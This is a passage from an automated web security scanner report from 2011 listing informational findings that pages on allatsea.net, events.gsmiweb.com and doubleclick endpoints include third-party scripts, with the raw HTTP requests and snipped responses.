</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
25.2. http://allatsea.net/by-category/Cruising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /by-category/Cruising

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /by-category/Cruising HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.1.10.1304734000; __qca=P0-1797107816-1304734004419

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:10:49 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 43446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/en_US"></script>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
25.3. http://allatsea.net/by-category/Deep_Sea_Fishing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /by-category/Deep_Sea_Fishing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /by-category/Deep_Sea_Fishing HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1797107816-1304734004419; __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.3.10.1304734000

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:10:59 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 45260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/en_US"></script>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
25.4. http://allatsea.net/by-category/Sailing_Regatta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /by-category/Sailing_Regatta

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /by-category/Sailing_Regatta HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.1.10.1304734000; __qca=P0-1797107816-1304734004419

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:10:13 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 45319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/en_US"></script>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
25.5. http://allatsea.net/classifieds.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /classifieds.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /classifieds.php HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/directclassifieds.php?menuCategories=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1797107816-1304734004419; __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.6.10.1304734000

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:14:41 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 21454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/en_US"></script>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
25.6. http://allatsea.net/directclassifieds.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /directclassifieds.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /directclassifieds.php?menuCategories=8 HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/subscribe.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1797107816-1304734004419; __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.5.10.1304734000

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:13:31 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 19526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/en_US"></script>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
25.7. http://allatsea.net/subscribe.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /subscribe.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /subscribe.htm HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1797107816-1304734004419; __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.4.10.1304734000

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:12:31 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 11 Apr 2011 02:45:48 GMT
ETag: "7880d72-59bd-92ac8f00"
Accept-Ranges: bytes
Content-Length: 22973
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/en_US"></script>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
25.8. https://events.gsmiweb.com/subscribe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /subscribe.php?event_id=82 HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/events.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:39:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 40247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="te
...[SNIP]...
</script>
<script language="JavaScript" src="https://secure.comodo.net/trustlogo/javascript/trustlogo.js" type="text/javascript"></script>
...[SNIP]...
25.9. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=2588797;type=nausc826;cat=naush555;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 06 May 2011 22:33:35 GMT
Expires: Fri, 06 May 2011 22:33:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 533

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" he
...[SNIP]...
</IFRAME> <script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">
</script>
...[SNIP]...
25.10. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-9585000347357330&output=html&h=60&slotname=9318179706&w=468&lmt=1304752004&flash=10.2.154&url=http%3A%2F%2Fallatsea.net%2F&dt=1304734004015&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=6980537247%2C8399079020&correlator=1304734002949&frm=0&adk=1407256996&ga_vid=126629396.1304734000&ga_sid=1304734000&ga_hid=782758865&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&eid=33895213&fu=0&ifi=3&dtd=530&gcv=gcm_8b3e97d1045ac48216d6355dac344a85.js HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
